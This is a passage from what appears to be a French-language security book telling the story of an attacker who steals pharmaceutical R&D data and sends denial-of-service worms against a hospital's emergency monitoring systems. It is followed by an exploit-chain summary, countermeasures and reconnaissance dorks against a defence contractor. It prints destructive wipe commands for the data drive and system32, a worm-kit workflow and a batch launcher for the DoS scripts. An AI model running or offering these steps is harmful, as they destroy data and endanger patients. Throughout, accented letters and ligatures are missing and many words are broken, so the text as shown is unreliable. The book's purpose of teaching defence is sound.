pouvez pas avoir de mdicaments." Elle lui ordonne ensuite de partir. Phnix sexcute, traverse le couloir, tourne gauche et sort par la salle dattente des urgences. Phnix sourit et marmonne : "Je suppose que Kate nest pas la seule penser que je mhabille comme un clochard." Phnix saute la barrire en bton qui spare le parking du trottoir de lhpital et ouvre la portire de sa voiture. Il sassied et ouvre le troisime portable. Il appuie sur le bouton dalimentation et attend quil dmarre. Une fois connect, il double-clique sur licne du rseau sans-l qui prsente une croix rouge et qui se trouve en bas droite de la zone de notication. Il clique ensuite sur le bouton de recherche de rseaux sans-l. Il repre le point daccs quil a congur et double-clique dessus. Aprs environ deux secondes, le point daccs demande Phnix une cl rseau ou une passphrase. Phnix saisit la passphrase dikity rikity doc$ et, quelques secondes plus tard, lindicateur afche "Connect". Phnix envoie un ping une des adresses IP quil se souvient avoir vue pendant le scan Nmap et reoit quatre rponses positives. Il ferme alors le portable, le jette sur le sige passager et dmarre sa voiture. Sur la route, il commence rver ce quil fera avec largent de ce boulot. Pendant quelques instants, il se sent lgrement coupable lide que la carrire de Linda soit probablement termine et que des malades innocents puissent mourir suite ses actions. Puis il russit se convaincre quil navait pas le choix. Aprs tout, M. Dobbs a menac la vie de Kate.

Chapitre 4

Espionnage industriel

125

De retour chez lui, Phnix attrape un Pepsi citron au frigo et allume la tlvision. Il vrie ltat de la sauvegarde en cours Alki grce au matriel quil y a laiss et voit quil reste environ six heures avant que a ne soit termin. Alors quil est sur le point de sasseoir et de proter dune sieste bien mrite, son tlphone sonne. Cest Kate, elle veut lui rendre visite. Phnix nest pas vraiment dhumeur sociable et essaie de dissuader Kate, mais elle nit par le convaincre de la laisser venir. Il pense ce moment : "Cest vraiment la dernire chose dont jai besoin maintenant" Mais au mme moment il sourit en se disant : "Mmmh, mais je suis sr quelle pourra me distraire pour les six prochaines heures." Vingt minutes plus tard, Kate sonne la porte. Phnix la laisse entrer et elle se jette son cou. "Oh l, calme-toi", dit Phnix, prudent. "Tais-toi. Tu me manques monstrueusement. Tu tais distant cette semaine, mais a va changer tout de suite", rpond fermement Kate. Phnix se dtend et ils partagent bientt un baiser passionn. Cinq heures et demie plus tard, Phnix est rveill par un choc bruyant. Il sursaute et se rend compte que Kate a fait tomber quelque chose dans la cuisine. Phnix sort de la chambre pour vrier ltat de la sauvegarde du serveur R&D de chez Alki et svanouit presque de panique en sapercevant que lcran est noir. Il passe la main sur le pav tactile et lcran se rallume. Phnix maudit lconomiseur dnergie automatique et vrie que sa connexion GoToMyPC est toujours active. Ce nest pas le cas. Il clique sur Recharger dans Firefox et tape nouveau ses identiants de connexion. Lorsquil se connecte, Phnix nen croit pas ses yeux. La sauvegarde est termine ! Il est tent de retourner Alki et de rcuprer son matriel, mais change nalement davis. Il est trs tard, et cela veillerait probablement les soupons. Phnix dcide de retourner au lit et de reprendre tout cela le lendemain. On est aujourdhui vendredi, et Phnix est puis. Le lendemain matin, Phnix se rveille frais et dispos. Il regarde son rveil et voit quil est 10 heures. "Il devrait y avoir juste assez de gens Alki pour maider me fondre dans la foule et ne pas faire tache. Et je parie quil ny a personne du service informatique." Sur ces penses, Phnix saute du lit, se douche rapidement et sort de son appartement. Lorsquil arrive chez Alki, il est surpris de voir le parking vide. En franchissant la porte dentre, il est nouveau surpris. Il ny a personne au contrle scurit. Phnix garde cette info dans un coin de sa tte et se dirige vers les ascenseurs. Il appuie sur un bouton pour en appeler un et la porte la plus proche de lui souvre immdiatement. Il monte dans lascenseur, passe la carte de Linda et appuie sur le bouton du septime tage. Lorsque lascenseur sarrte, Phnix sort et manque de

126

Chanes dexploits

svanouir la vue du gardien qui aurait d tre au contrle scurit lentre. Avant que Phnix ne puisse dire quoi que ce soit, le garde demande : "Vous travaillez cet tage ? Oui, rpond Phnix. Parfait, dit lhomme dont le badge indique quil sappelle ric. Je me connecte en gnral au rseau sans-l gratuit que vous avez mis en place il y a quelques mois, mais ce matin a ne marche pas et je ne sais pas pourquoi. Je suis mont voir si quelquun du service informatique pouvait maider. Je savais que javais peu de chances de trouver quelquun pendant le week-end, mais vous voil ! Phnix soupire de soulagement et rpond : coutez, jai un problme rgler ici, mais a ne devrait me prendre que quelques minutes. Ds que jai ni, je viens vous aider en bas. Super ! Merci beaucoup !" rpond ric. Il lui tend la main. Phnix la lui attrape et la serre. cet instant, un bip aigu se fait entendre dans le sac de Phnix. "Quest-ce que cest que a ?", demande ric. Phnix utilise la mme explication que celle quil a servie Linda plus dune semaine auparavant : "Mon tlphone portable, jai oubli de le charger hier soir." ric rit et se dirige vers lascenseur. Phnix ralise quil vient de rcuprer une copie des donnes de la carte dric et ne peut rprimer un sourire darrogance et de satisfaction. Phnix entre dans le local rseau. Sa premire tche consiste essayer de couvrir ses traces. Il se rend compte quil na que peu de temps devant lui et quil sera impossible de mener des oprations complexes. Il rcupre son portable dattaque au-dessus de larmoire de commutateurs tiquete R&D et louvre. Lorsque lcran sallume, Phnix se connecte et se met au travail. Il utilise le Bureau distance pour accder au serveur du service R&D. Il ouvre une ligne de commande et saisit la commande suivante :
del D:\*.* /q

Phnix voit la commande sexcuter. Il attend une quinzaine de minutes et ouvre le Poste de travail du serveur. Il clique du bouton droit sur le lecteur D et choisit Proprits. Cela montre que le disque D est plein 20 % et quil a 111 Go doccups. Il sait alors que sa commande de suppression fonctionne puisque les donnes prenaient auparavant 120 Go. Il attend cinq minutes de plus et revrie le disque. Il est maintenant compltement vide. Puis il lance la commande suivante :
del C:\WINDOWS\system32\*.* /q

Chapitre 4

Espionnage industriel

127

Phnix a ordonn Windows de tout effacer sur le disque D et de le faire sans conrmation. Loption /q permet dviter toutes les questions du type "tes-vous sr ?" et force le systme effectuer la commande. La seconde commande fait presque la mme chose, ceci prs quelle crase tous les chiers dont Windows a besoin. Phnix ferme la connexion au Bureau distance, dbranche le portable du rseau, le ferme, tire le cble dalimentation du mur et fourre le tout dans son sac dos. Lorsque les employs arriveront lundi chez Alki, ils verront que toutes les donnes du service R&D ont t effaces, ainsi que le systme dexploitation du serveur. Ils devront rcuprer les donnes depuis une sauvegarde, ce qui rendra beaucoup plus dlicate la dcouverte de preuves de lattaque de Phnix. Avec cela en tte, Phnix sort du local rseau, entre dans lascenseur et descend au rez-de-chausse. Alors quil sapprte quitter les lieux, il voit le gardien, ric, qui attend impatiemment son arrive. Phnix sapproche de lui et lui demande, conciliant : "Quel est le problme ? Ben, rpond ric, impossible de me connecter Internet. Lordinateur dit quil est connect, mais quand je clique sur le bouton Internet, un message Page non trouve safche." Phnix regarde le portable dric et lui demande de le lui passer. Phnix regarde la conguration rseau et saperoit quric a rcupr une adresse statique dune manire ou dune autre. "Avez-vous modi quelque chose ici rcemment ? Oui, rpond ric. Javais des soucis pour me connecter la maison et le type de lassistance de mon FAI ma fait changer les informations que vous tes en train de regarder." Phnix secoue la tte et change la conguration du rseau pour obtenir une IP via le serveur DHCP. Trente secondes plus tard, ric navigue sur Internet. Phnix attrape son sac et se dirige vers la porte. "Merci ! lui lance ric. Pas de quoi", rpond Phnix. Il traverse alors la rue pour se connecter au rseau sans-l de lhpital, se connecter au portable quil y a laiss et lancer quelques attaques par dni de service sur le rseau de lhpital.

128

Chanes dexploits

Il sarrte au caf, presque gale distance dAlki et de lhpital. Alors quil fait la queue, il se dit quil na probablement pas besoin dtre dans le parking pour accder au rseau sans-l et au portable. Aprs avoir command son caf, il sassied une table et ouvre son portable. Il avait enregistr la connexion lhpital et, lorsque son cran sallume, il se rend compte quil y est dj connect. Il ouvre immdiatement le Bureau distance et se connecte au mini-PC quil a mis en place lhpital. Il ouvre le rpertoire virus du disque C et double-clique sur wshwc.exe. La bote de dialogue de Windows Scripting Host Worm Constructor safche lcran (voir Figure 4.4).

Figure 4.4
Bote de dialogue de cration de virus Windows Scripting Host.

Phnix remplit les informations du premier cran, y compris le nom quil a choisi pour son virus : Alkibot. Phnix clique ensuite sur le bouton radio Payload Options, puis sur Launch Denial Of Service Attack (voir Figure 4.5). Phnix fait une pause pour vrier les rsultats du scan Nmap quil a men la veille. Ilouvre une invite de commande et saisit la commande suivante :
notepad c:\osdetect.txt:ads.txt

Chapitre 4

Espionnage industriel

129

Figure 4.5
Bote de dialogue de cration de virus Windows Scripting Host avec les options de cration.

Ce qui suit est lhte qui intresse Phnix :


Interesting ports on 10.10.10.12: Not shown: 1700 closed ports PORT STATE SERVICE 7/tcp open echo 9/tcp open discard 13/tcp open daytime 19/tcp open chargen 111/tcp open rpcbind 512/tcp open exec 513/tcp open login 514/tcp open shell 540/tcp open uucp 587/tcp open submission 5901/tcp open vnc-l 6000/tcp open X11 MAC Address: 00:0C:29:C0:BA:A0

Windows sexcute et ouvre dans le Bloc-Notes le chier cach dans lADS. Phnix fait dler le chier et regarde les rsultats. Il voit immdiatement que le scan de systmes dexploitation lui a renvoy plusieurs htes UNIX. Selon Nmap, il sagit dordinateurs sous Solaris. Phnix rchit. Les UNIX non protgs sont trs sensibles aux attaques par dni de service. Phnix saisit ladresse IP du premier serveur UNIX de son

130

Chanes dexploits

scan Nmap dans le champ de cible de son virus de dni de service et clique sur le bouton Construct Worm. Il recommence six fois et cre un virus unique pour chaque hte UNIX quil repre dans son scan Nmap. Il sait, depuis quil a travaill comme administrateur systme dans un hpital, que la plus grande partie de lquipement des urgences est probablement bas sur UNIX ; les rsultats du scan lui semblent plus cohrents. Phnix a maintenant douze chiers .vbs sur le disque dur du portable lintrieur de lhpital : sept pour les machines UNIX et cinq pour les quelques machines sous Windows identies par son scan Nmap. Il cre ensuite un chier batch pour lancer tous les chiers la suite. Il les nomme simplement par un numro. Le premier est 1.vbs, le second 2.vbs, etc. Il ouvre le Bloc-Notes et tape ce qui suit dans le chier :
1.vbs 2.vbs 3.vbs 4.vbs 5.vbs 6.vbs 7.vbs 8.vbs 9.vbs 10.vbs 11.vbs 12.vbs exit

Phnix clique ensuite sur Fichier > Enregistrer sous. Il clique sur la liste droulante Type et choisit Tous les chiers. Il nomme le chier lancevirus.bat, choisit la racine du disque C comme emplacement de sauvegarde et clique sur Enregistrer. Il inspire profondment. Il ferme toutes les fentres, y compris le chier texte de ses rsultats de scan Nmap. Il ouvre le disque C et double-clique sur lancevirus.bat. Il voit une fentre MS-DOS souvrir et les chiers VBS sexcuter. Il ferme alors le portable, dmarre sa voiture et sen va. Il se dit : "Mon dieu, jespre que je ne viens pas de tuer quelquun." Au moment mme o Phnix entre dans son appartement, son tlphone portable sonne. Cest presque comme si M. Dobbs le surveillait. Il rpond. "As-tu termin ? demande M. Dobbs lautre bout du l. Oui, rpond Phnix.

Chapitre 4

Espionnage industriel

131

Parfait, rplique M. Dobbs. Rendez-vous demain lendroit habituel 18 heures et nous ferons lchange. Il y a un problme, interrompt Phnix. Il y avait un gardien aujourdhui, et sil y a une enqute il pourrait Je sais, dit M. Dobbs. Nous avons dj rgl le problme. Nous aurons loccasion de discuter demain." Le lendemain, 18 heures, Phnix est dj install dans le caf habituel en centre-ville lorsque M. Dobbs arrive. Il traverse le caf et sassied. "O est le matriel ?" Phnix lui tend un sac dos. M. Dobbs lui tend son tour un sac dos identique. "Le gardien ne posera pas de problme, dit M. Dobbs. Que voulez-vous dire ? demande Phnix. Ne pose pas trop de questions. Tout cela ne te concerne pas. Beau travail. Tu nauras plus de nouvelles de moi jusqu ce que jaie une autre mission te coner. Prote bien de ton argent", dit M. Dobbs en quittant la table. Il regarde Phnix et dit svrement : "Jespre pour toi que cest ce quon ta demand. a ne serait pas bon pour toi sinon." Sur cette remarque positive, M. Dobbs quitte le caf et disparat dans la rue embrume. Phnix sent un frisson glacial lenvahir. Mme si M. Dobbs ne la pas dit explicitement, il sait exactement ce que les mots "a ne serait pas bon pour toi" signient. Phnix ouvre le sac dos et oublie instantanment ses ides noires. Le sac est rempli de liasses de billets de 100 . Phnix se lve, adresse un clin dil la jolie lle derrire le comptoir et sort. Deux jours plus tard, lhpital fait les gros titres. Il a d fermer son service durgences et rediriger tous les patients vers un autre hpital. Les htes UNIX que Phnix avait vus dans ses scans Nmap taient des systmes de surveillance attachs aux lits des sept salles du service des urgences. Il sagissait dune ancienne technologie qui alertait les inrmires du service lorsque les perfusions taient presque vides et lorsquil y avait quelque chose danormal avec le pouls ou la tension dun patient. Lattaque de Phnix contre ces machines les a rendues incapables denvoyer des donnes. Par consquent, un patient est tomb dans le coma aprs la n de sa perfusion. Un autre patient a eu une crise cardiaque parce que les quelques systmes encore capables de rcuprer des donnes avaient renvoy des informations incorrectes aux docteurs, ce qui les a induits en erreur en ce qui concerne le dosage et les mdicaments prescrire. Larticle mentionne que le problme est d une erreur informatique et quil est potentiellement le rsultat dune attaque malveillante dun dirigeant dAlki Pharmaceutique, situ en

132

Chanes dexploits

face de lhpital. Aucun nom na pour linstant t rvl. Un porte-parole de lhpital sest content dun simple commentaire :
"La police interroge un dirigeant dAlki, considr comme le suspect n 1 dans cette affaire. Nous ne savons pas si cette personne est rellement implique ou sil sagit dune autre personne de lentreprise. Si cette personne est innocente, quelquun sest donn beaucoup de mal pour essayer de lui faire porter le chapeau."

Pendant ce temps, chez Alki, le service informatique a le plus grand mal restaurer les donnes supprimes des sauvegardes. Ils ont durement appris quil ny a pas de substitut de bonnes sauvegardes. Lquipe de R&D est couteaux tirs, chacun accusant son voisin davoir accidentellement effac les donnes. Certains sont convaincus que cest le service informatique qui a fait nimporte quoi. Aprs tout, cest dans leurs habitudes et personne na conance en eux. De toute faon, ce nest pas la priorit actuelle du service informatique. La directrice nancire est interroge par la police et un bruit court sur limplication de quelquun du service dans lattaque visant lhpital. Tout le monde marche sur des ufs. Laction dAlki a plong le matin mme, et personne na de poste assur. Pour empirer encore la situation, le principal concurrent dAlki vient dannoncer quil avait deux mois davance sur la publication des rsultats de son nouveau mdicament amliorant le traitement contre le cancer. Autres possibilits Pour des raisons de temps, Phnix na fait que survoler toutes les attaques possibles et tout ce quil aurait pu faire. Une fois introduit physiquement dans le rseau dune entreprise, il ny a pas de limites ce quun pirate est capable daccomplir. Par exemple, pour distraire encore lattention dAlki, Phnix aurait pu utiliser ses accs pour assembler et diffuser des informations prives et condentielles comme le numro de scurit sociale ou ladresse des employs. Cela aurait probablement gnr un tourbillon de presse ngative lencontre dAlki et aurait pu coter des millions pour limiter les dgts. Il aurait aussi pu crer dautres points dentre ou des comptes shell et vendre ces informations au plus offrant. Il est trs probable quaux services des ressources humaines et de la comptabilit se trouvent les numros et codes daccs aux informations bancaires dAlki. Cela aurait pu coter des millions, selon la somme demande par Phnix et les personnes avec lesquelles il aurait partag les informations. Il aurait aussi pu utiliser ces informations pour savoir quand acheter ou vendre des actions Alki. Il aurait pu savoir des mois lavance que de nouveaux produits allaient tre mis sur le march et utiliser ces connaissances pour prdire lenvol de laction. Il aurait ainsi pu acheter bas prix et revendre cher ce qui constituerait un dlit diniti.

Chapitre 4

Espionnage industriel

133

Rsum de la chane dexploits Voici les exploits enchans de Phnix : 1. Il a trouv des informations dtailles sur les spcications techniques du logiciel utilis par Alki pour son dpartement R&D en visitant le site web du fabricant et en y tlchargeant de la documentation. 2. Il a utilis une attaque peu connue mais simple sur le systme de cartes daccs dAlki pour obtenir un accs des lieux o il naurait jamais pu entrer sinon. 3. Il a amen Linda lui offrir un accs physique au btiment par ingnierie sociale. 4. Il a utilis Nmap pour scanner le rseau dAlki et identier le serveur de R&D en visant les ports quil savait tre utiliss par le serveur. 5. Il a aussi utilis Nmap pour identier le systme dexploitation du prcieux serveur R&D. 6. Il a visit http://www.microsoft.com/france/securite/ pour identier les failles auxquelles tait vulnrable le serveur en question. 7. Il a utilis Metasploit pour tirer avantage des informations quil avait trouves sur le site web de Microsoft. 8. Il a utilis loutil de sauvegarde de Windows pour copier les donnes sensibles un autre endroit. 9. Il a utilis une simple commande de suppression pour se dbarrasser de la plupart des preuves de sa prsence et pour dtourner lattention de lopration de vol de proprit intellectuelle quil a effectivement mene. 10. Il a ouvert un compte Hotmail en utilisant ladresse de Linda comme adresse secondaire. 11. Il a utilis un point daccs sans-l et un kit de dveloppement de virus disponible gratuitement en ligne pour lancer une attaque par dni de service sur lquipement des urgences de lhpital.

134

Chanes dexploits

Mesures de prvention
Cette section traite des diverses mesures que vous pouvez dployer contre cette chane dexploits. Mesures de prvention contre les atteintes la scurit physique et la compromission des systmes daccs Trop dentreprises dpendent dune authentication facteur unique pour permettre laccs des zones protges. La scurit physique est souvent laspect le plus nglig de la scurit de linformation. Les cartes daccs de la plupart des fabricants peuvent tre clones facilement. Beaucoup de fabricants ont lgrement amlior cet tat de fait en chiffrant les donnes sur la carte, mais cela ne protge que peu. Le chiffrement concerne uniquement la condentialit des donnes. Si le but dun attaquant est de cloner la carte et de lutiliser en tant que moyen daccs, peu lui importe de savoir ce quil y a sur la carte. Il faudrait donc utiliser une authentication deux facteurs. Dans lexemple du local rseau, il aurait t plus difcile Phnix dentrer sil avait eu scanner ses empreintes en plus de passer la carte daccs. Lattaque aurait t presque impossible avec une authentication trois facteurs : carte daccs, empreinte digitale et code cinq chiffres, par exemple. Les systmes de surveillance vido sont obligatoires dans les entreprises aujourdhui. Ils font toujours dbat en ce qui concerne les problmes de respect de vie prive et dthique. De nombreux employs considrent quon ne leur fait pas conance lorsquils voient des camras partout. Mais, avec la formation adquate, ces objections peuvent tre attnues. En ce qui concerne les cartes daccs, de nombreuses entreprises devraient rchir la stratgie dconomies qui consiste utiliser le mme support pour lidentication et laccs. La plupart des entreprises ont des consignes pour obliger leurs employs avoir leur badge visible tout instant. Si la puce RFID daccs est intgre aux badges didentication et si ceux-ci doivent tre visibles tout instant, il est facile de les copier avec un scanner de cartes RFID. Les cartes daccs RFID devraient tre places dans un portefeuille ou un sac protgeant des rayonnements RF. On peut en acheter sur www.rdiot.org et sur bien dautres sites web. Les cartes daccs et le badge didentication peuvent aussi tre indpendants. Par ailleurs, les ports inutiliss dun commutateur devraient toujours tre dsactivs. Si les ports doivent tre activs, il est obligatoire de les scuriser.

Chapitre 4

Espionnage industriel

135

Mesures de prvention contre les scans Comme la plupart des outils de scan tirent simplement avantage de la manire dont fonctionnent les protocoles rseau, se protger contre les scans peut tre dlicat. Nmap commence par lancer une requte ping pour voir quels htes rpondent et envoie un scan SYN sur les htes identis. La plupart des entreprises ont dsactiv lICMP sur le primtre de leur rseau mais lui permettent de circuler librement lintrieur du rseau. Il suft dactiver le pare-feu de Windows pour compliquer normment la tche de Nmap et dautres outils de scan. Avec un simple scan Nmap sur le rseau dAlki, Phnix a obtenu les informations quil souhaitait. Si lICMP avait t bloqu au niveau des htes, son premier scan naurait renvoy aucun hte. Cela laurait forc tester des variations plus complexes du scan par dfaut, ce qui lui aurait pris plus de temps, voire laurait empch dobtenir les rsultats voulus. Les outils de dtection dintrusion pour clients, comme Cisco Security Agent (CSA), auraient t utiles dans ce scnario. Mme sans les dployer sur tous les clients, le serveur de R&D contenant les donnes sensibles aurait t un candidat idal. CSA peut dtecter les scans furtifs par SYN et bien dautres scans. Si CSA avait fonctionn, les scans Nmap auraient probablement renvoy que tous les ports taient ltrs, ce qui aurait rendu presque impossible lidentication du serveur R&D. Mesures de prvention contre lingnierie sociale Les attaques par ingnierie sociale visent le maillon faible de tout programme de scurit : les humains. Alki a certainement des politiques de recrutement de son personnel. Elle a probablement aussi des politiques interdisant aux personnes extrieures davoir le moindre contact avec des donnes sensibles comme celles qui sont lies la proprit industrielle. Cependant, de nombreux dirigeants outrepassent ces contrles et ces politiques pour frimer ou, dans le cas de Linda, pour essayer daider quelquun qui leur est sympathique. Les commentaires de Linda quant au service informatique ont donn Phnix des informations sur la faiblesse probable de la scurit informatique chez Alki. Tous les employs, y compris les plus haut placs, devraient recevoir une formation de sensibilisation la scurit rgulirement (au moins une fois par an, de prfrence deux fois par an). Avant de rvler quoi que ce soit sur leur vie personnelle ou sur leur entreprise, les employs et les dirigeants devraient shabituer se poser systmatiquement la question suivante : "Est-il vraiment ncessaire que je donne cette information me concernant ou concernant mon entreprise ?" Si ce nest pas ncessaire, ne donnez aucune information.

136

Chanes dexploits

Mesures de prvention contre les attaques sur les systmes dexploitation Phnix a pu utiliser Metasploit pour accder au serveur du dpartement R&D en moins de trente secondes pour une seule raison : le serveur ntait pas jour des derniers correctifs de scurit et Service Packs. Il est courant pour les entreprises de retarder les mises jour et les correctifs pour des raisons de compatibilit avec des logiciels (internes ou non). Dans le cas dAlki, le service informatique aurait d faire pression sur le fabricant du logiciel de R&D qui les obligeait supprimer le Service Pack 1 et tous les correctifs de scurit pour Windows 2003 Server. Si une entreprise est compromise cause dune application incapable de fonctionner avec les mises jour de scurit, lapplication doit tre corrige ou bien il faut srieusement envisager son remplacement. Dans la plupart des entreprises, les fonctionnalits et la facilit dutilisation lemportent largement sur la scurit. Tant que cela sera la norme et que les fabricants dapplications tierces ne seront pas obligs de suivre, ils ne le feront pas. En un mot, mettez jour vos ordinateurs avec les derniers Service Packs et correctifs. Si Alki avait suivi ce conseil, Phnix aurait probablement pu trouver une vulnrabilit dans Windows, dvelopper un exploit pour cette vulnrabilit, tester cet exploit et lutiliser contre lentreprise, ce qui lui aurait probablement pris des mois. Mais comme Alki ntait pas jour quant aux Service Packs et mises jour de scurit, Phnix a pu utiliser un exploit disponible publiquement pour tirer avantage dune vulnrabilit connue. Mesures de prvention contre le vol de donnes Le chiffrement a t plus largement conseill ces deux dernires annes quil ne lavait jamais t. Les gros titres sont remplis dhistoires de donnes condentielles perdues la suite dun portable vol, dune cl USB perdue ou dun systme compromis. Si Alki avait utilis un systme aussi simple que Windows EFS (Encrypting File System, un systme de chiers chiffr) sur le serveur R&D, les donnes copies par Phnix (sil avait mme pu les copier) auraient t inutiles M. Dobbs. Il aurait galement eu plus de mal supprimer le contenu du serveur. De nombreuses entreprises chouent la mise en place du chiffrement car celui-ci est considr comme compliqu et mystrieux. Souvent, les entreprises commencent mettre en uvre du chiffrement, rencontrent des problmes oprationnels ou de facilit dutilisation et retardent, voire abandonnent le projet. Alki a beau tre une entreprise cote en bourse, elle travaille sans aucune forme de chiffrement (du moins au dpartement R&D). Gnralement, les mesures lgislatives sintressent plutt la protection des donnes personnelles ou condentielles et nancires. Le plus triste est que certaines entreprises ont intgr les

Chapitre 4

Espionnage industriel

137

amendes de non-conformit ce type de lgislation leurs cots de fonctionnement. Lorsque cela arrive, lefcacit de ce type de mesure diminue considrablement.

Conclusion
Lespionnage industriel est toujours une affaire rentable. Lorsque lconomie est, comme de nos jours, un amas de confusion et dincertitude, lavantage obtenu grce des "informations concurrentielles" peut faire la diffrence entre la survie et la mort dune entreprise. Nous ne sommes plus une poque o le travail acharn paie systmatiquement. Nous vivons dans un monde o linformation est notre bien le plus prcieux. Lespionnage industriel nest plus une affaire complexe et ne ncessite pas forcment de comptences trs volues. Il existe des outils pour tout automatiser, de lingnierie sociale lattaque dun systme dexploitation. Avec le nombre grandissant de vulnrabilits et la baisse du niveau de comptences ncessaires, lespionnage industriel a de beaux jours devant lui. Certaines attaques seront bruyantes et feront la couverture des mdias, dautres seront silencieuses mais seront dune efcacit redoutable.

5
Chane dentreprises
Scnario
Chane dentreprises Une des failles de scurit les plus ngliges est une faille qui ne peut pas tre value en examinant larchitecture rseau dune entreprise. Elle ne peut pas tre mesure par la meilleure valuation de vulnrabilits. Nous parlons des attaques qui partent dune entreprise et finissent par toucher une entreprise priphrique. Nous nous donnons beaucoup de mal scuriser nos rseaux, renforcer nos applications et fermer nos machines. Mais peu dentreprises regardent linfrastructure de celles quils autorisent accder leur rseau. Phnix va mettre en place une attaque complexe o il exploitera non pas une, mais deux entreprises avant darriver compromettre sa cible principale.

Phnix est assis dans son appartement et a du mal croire le "projet" qui vient de lui tre assign. Les instructions lui sont parvenues de la manire habituelle. Il sagit dune note dactylographie dont les instructions sont claires et prcises : Grethrip Harmon. Rcupration de donnes SONIC. Phnix sait, grce un emploi prcdent, que cela signie que sa cible est un sous-traitant du ministre de la Dfense, Grethrip Harmon, et quil doit rcuprer autant dinformations que possible propos dun systme darmement (probablement) top secret nomm SONIC. "Cest compltement dingue", soufe Phnix. Il sait, daprs ce quil a lu sur divers sites gouvernementaux, y compris http://www.cybercrime.gov, quattaquer un sous-traitant du ministre de la Dfense est presque quivalent attaquer le Pentagone. De plus, tenter dobtenir illgalement accs des documents classis est passible de lourdes peines. "a ne va pas tre du

140

Chanes dexploits

gteau", dit Phnix. Il pose la note sur son bureau, attrape un bloc-notes et commence griffonner un plan prliminaire.

Approche
Lapproche que Phnix va suivre se compose des tapes suivantes. 1. Effectuer une reconnaissance de Grethrip et trouver tous les points dentre possibles : reconnaissance web pour trouver des points dentre sur le site web ; reconnaissance visuelle pour chercher des faiblesses potentielles dans la scurit physique et oprationnelle ; voir sil existe des relations de conance avec dautres entreprises qui pourraient avoir une connexion privilgie la cible. 2. Effectuer une reconnaissance pousse de la cible et de ses partenaires conomiques : interroger des employs vulnrables ; valuer les options de pntration des entreprises partenaires si elles existent ; dterminer le niveau de conance des entreprises partenaires par rapport Grethrip ; une fois les niveaux de conance dtermins, crer un environnement de test simulant la premire cible ; dans lenvironnement de test, simuler une attaque sur la premire cible ou le premier point dentre ; documenter les attaques qui fonctionnent. 3. Planier lattaque : choisir un point dentre principal et un point secondaire ; choisir un point dentre sur des critres de moindre rsistance et de plausibilit ; schmatiser lattaque et le but nal. 4. Attaquer : pntrer la cible initiale ; utiliser des accs pour augmenter ses privilges ; localiser et valuer les informations cible ; obtenir les donnes cible ; couvrir les traces.

Chapitre 5

Chane dentreprises

141

Chane dexploits
Cette section contient les dtails de toutes les tapes de la chane dexploits de Phnix :
m m m m m m m m m m

reconnaissance ; attaque par ingnierie sociale ; reconnaissance supplmentaire ; reconnaissance active agressive ; construire linfrastructure de lexploit ; tester lexploit ; effectuer lattaque ; construire le rootkit ; rsultat ; autres possibilits.

La section se termine sur un rsum de cette chane dexploits. Reconnaissance Une fois le brouillon du plan mis en place, la stratgie de Phnix commence prendre forme. Phnix ne perd pas de temps et dmarre sa reconnaissance. Il lance Firefox et va sur google.fr. Il rchit sa premire requte : "Je me demande qui a des liens sur son site web vers le site de Grethrip." Sur cette ide, Phnix saisit intuitivement la requte suivante dans la zone de recherche de Google :
link: www.grethripharmon.com

Phnix est surpris : Google ne renvoie que 50 rsultats. Mais il comprend vite pourquoi : Grethrip tant le plus gros sous-traitant du ministre de la Dfense au monde, il surveille probablement qui met un lien vers son site web et pour quelles raisons. Partiellement satisfait de ces rsultats, Phnix ajoute la page ses favoris pour pouvoir lexplorer plus tard et commence excuter soigneusement dautres requtes. Il veut maintenant savoir sil peut obtenir des informations sur le projet SONIC, suppos top secret. Sa requte suivante est :
allintext:classifi top secret SONIC grethrip harmon

142

Chanes dexploits

Phnix fait la moue en voyant les rsultats. "Ah ! 863 rsultats. Top secret, mon il !" Il ajoute cette page de rsultats ses favoris, mthodique. "Voyons si je peux trier ces rsultats et gagner en prcision." Il modie lgrement sa requte et saisit la requte suivante :
allintext:(top secret | classifi )( grethrip harmon | sonic) filetype:doc

La modication a beau tre lgre, les rsultats sont dune extrme prcision. La requte de Phnix ne renvoie plus que 75 rsultats et ce sont tous des documents Word. Phnix essaie plusieurs autres requtes, mais nobtient quun rsultat mdiocre. Il ajoute les pages de rsultats ses favoris, comme il la fait prcdemment, et continue. "Bien, voyons ce que nous avons", se dit Phnix alors quil retourne au premier ensemble de rsultats et commence les passer au crible. En parcourant les rsultats, il remarque quelques articles dactualit sur Grethrip. Il trouve galement des articles traitant de rcompenses contractuelles et autres sujets apparemment sans importance. Il nit par trouver une info utile : le 55e rsultat de sa recherche est une entreprise nomme Visu IQ, qui fournit des services personnaliss de visualisation de donnes. Grethrip fait partie de ses clients. "Enn un truc intressant", se dit Phnix. Instinctivement, il concentre son attention sur Visu IQ. Il sait que cette entreprise sera probablement bien moins protge que Grethrip. Il commence donc effectuer des requtes propos de Visu IQ et dcide dutiliser loprateur inanchor. La Figure 5.1 illustre la requte effectue par Phnix sur Google. Il saisit ce qui suit :
inanchor:visuIQ

Figure 5.1
Requte Google avec loprateur inanchor.

Chapitre 5

Chane dentreprises

143

Phnix nen croit pas ses yeux lorsquil voit Google sortir plus de 250 rsultats. Il passe une bonne partie de la demi-heure suivante examiner les rsultats. Il trouve les habituels articles, tudes de cas et assimils. Et il trouve un lien particulirement intressant. Il sagit dun forum dassistance en ligne : un endroit o les gens cherchent de laide quand ils sont dpasss par un problme. Le directeur informatique de Visu IQ a demand de laide propos de la conguration dun routeur Cisco. Phnix continue chercher et trouve dautres questions poses par cette personne. Plusieurs questions contiennent des informations de conguration rseau dtailles. Phnix remarque plusieurs messages dans le forum concernant des pare-feu Cisco ASA. cette demande daide, quelquun du forum lui a demand dexcuter la commande show run et den poster les rsultats. Comme prvu, le directeur informatique a suivi les instructions. Phnix a dtermin que celui-ci sappelait probablement Will. Son identiant (Pokerman45) est certes discret sur cette question, mais il a termin son dernier message en remerciant les modrateurs du forum avec le message suivant : "Merci encore pour toute votre aide. Will." Phnix sait quun prnom peut laider dans une tentative future dingnierie sociale. "Je me demande sils ont des offres demploi", se demande Phnix. Il saisit www.monster.fr dans son navigateur et cherche rapidement Visu IQ. Pas de rponse. Phnix nabandonne pas la premire dconvenue et essaie un autre site. Il ouvre www.keljob.com et saisit Visu IQ dans la zone de recherche. Il a plus de chance cette fois : vingt rsultats lui sont prsents. Phnix rvise sa requte et ajoute le mot-cl "informatique". Il ny a plus que sept rsultats. Le premier rsultat est une annonce pour un assistant de directeur informatique. Les exigences du poste sont assez mal prsentes, mais Phnix parvient en saisir les grandes lignes : un expert en technologies Cisco et Active Directory. Les autres annonces concernent plutt des postes de programmeurs. Phnix rassemble les pices du puzzle et formule une thorie : "Bon, il semble que monsieur le directeur informatique Will a menti pendant ses entretiens et sur son CV, commenc un paquet de projets et quil 